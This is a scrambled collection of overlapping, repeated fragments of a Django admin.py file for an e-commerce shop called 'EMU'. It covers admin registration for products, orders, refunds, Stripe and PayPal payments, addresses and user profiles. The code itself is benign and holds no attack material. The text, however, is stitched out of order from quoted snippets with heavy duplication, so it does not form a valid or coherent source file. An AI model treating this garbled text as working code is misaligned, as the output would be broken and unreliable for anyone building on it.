['default', 'address_type', 'country'] search_fields = ['user',", "Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}),", "= 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment',", "= ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page =", "[make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date']", "admin from django.utils.html import format_html # from django.contrib.auth.models import Group from .models import", "'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code']", "Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin):", "'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return", "'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user',", "'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user',", "make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted'", "'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip',", "= ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields =", "'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image']", "= ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key',", "['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields':", "Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline):", "pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund)", "'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), )", "3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request,", "Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product)", "list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def", "'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj):", "django.utils.html import format_html # from django.contrib.auth.models import Group from .models import Product, CartProduct,", "class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',", "obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False,", "def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class", "= ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = (", "received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date',", "= ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label']", "('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request,", "Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category,", "= 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User", "'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address',", "'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address',", "('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name',", "Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user',", "queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin,", "make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description", "= [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets", "fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields':", "class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price',", "'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields':", "'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self,", "{'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered']", "['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display", "Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class", "['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields", "['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received]", "'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered',", "fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}),", "'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields':", "'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin):", "'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display =", "'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page", "request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display", "'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address',", "@admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered',", "readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req'", "= 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted',", "date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}),", "ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields':", "'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy", "= 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin,", "class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user',", "{'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description", "'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields =", "product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True,", "pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested',", "readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin):", "'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id',", "[ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''')", "'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items',", "= 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal", "request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def", "'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}),", "= 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip',", "'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass", "[ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields", "'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1',", "list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page", "PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code',", "('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class", "['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment)", "'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name',", "admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image',", "'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount',", "from django.utils.html import format_html # from django.contrib.auth.models import Group from .models import Product,", "'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user',", "ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\" admin.site.index_title", "refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin):", "Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model =", "= [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products',", "'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled',", "{'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email',", "Group from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages,", "'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links =", "@admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\" admin.site.index_title = \"Administration\"", "'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment',", "= ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted,", "'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted']", "Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display", "format_html # from django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address,", "{'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}),", "'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile)", "make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy", "['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields", "make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin):", "= ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting)", "def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset):", "'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon)", "src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders", "= [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ]", "('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity',", "accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields =", "@admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile", "'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class", "<img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description =", "import admin from django.utils.html import format_html # from django.contrib.auth.models import Group from .models", "'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user',", "refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received'", "'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class", "list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets =", "'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class", "RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted',", "'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy =", "[refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets =", "'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund',", "= ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon',", "'Update orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update", "from django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address, Payment, Coupon,", "{'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid',", "'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions", "['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered',", "['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions", "'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields", "class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo',", "'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered',", "['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country']", "'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page =", "refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code',", "'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested',", "{'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ]", "= ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass", "list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country',", "class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel]", "'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin):", "@admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default']", "['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1',", "'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def", "[ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment',", "('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon',", "{'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields':", "def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class", "['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class", "'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}),", "def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund", "'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip']", "'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile',", "pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\" admin.site.index_title =", "= ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type',", "import format_html # from django.contrib.auth.models import Group from .models import Product, CartProduct, Order,", "queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class", "@admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product',", "'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}),", "= 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information',", "Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',", "['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip']", "queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display =", "( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id',", "'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields =", "'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields':", "'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields':", "'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy", "'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username',", "'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product',", "date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order", "['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user',", "inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px'", "'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address)", "'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address',", "5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields':", "SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country',", "['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number',", "['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id',", "'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp'", "= [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/>", "'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields':", "'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town',", "height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update", "['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment',", "['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description =", "to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to", "from django.contrib import admin from django.utils.html import format_html # from django.contrib.auth.models import Group", "'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered',", "= ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display =", "'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links", "{'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code',", "['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets", "'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions =", "('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class", "actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin):", "('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested',", "('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery", "['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size)", "queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order',", "['user', 'amount', 'timestamp'] list_per_page 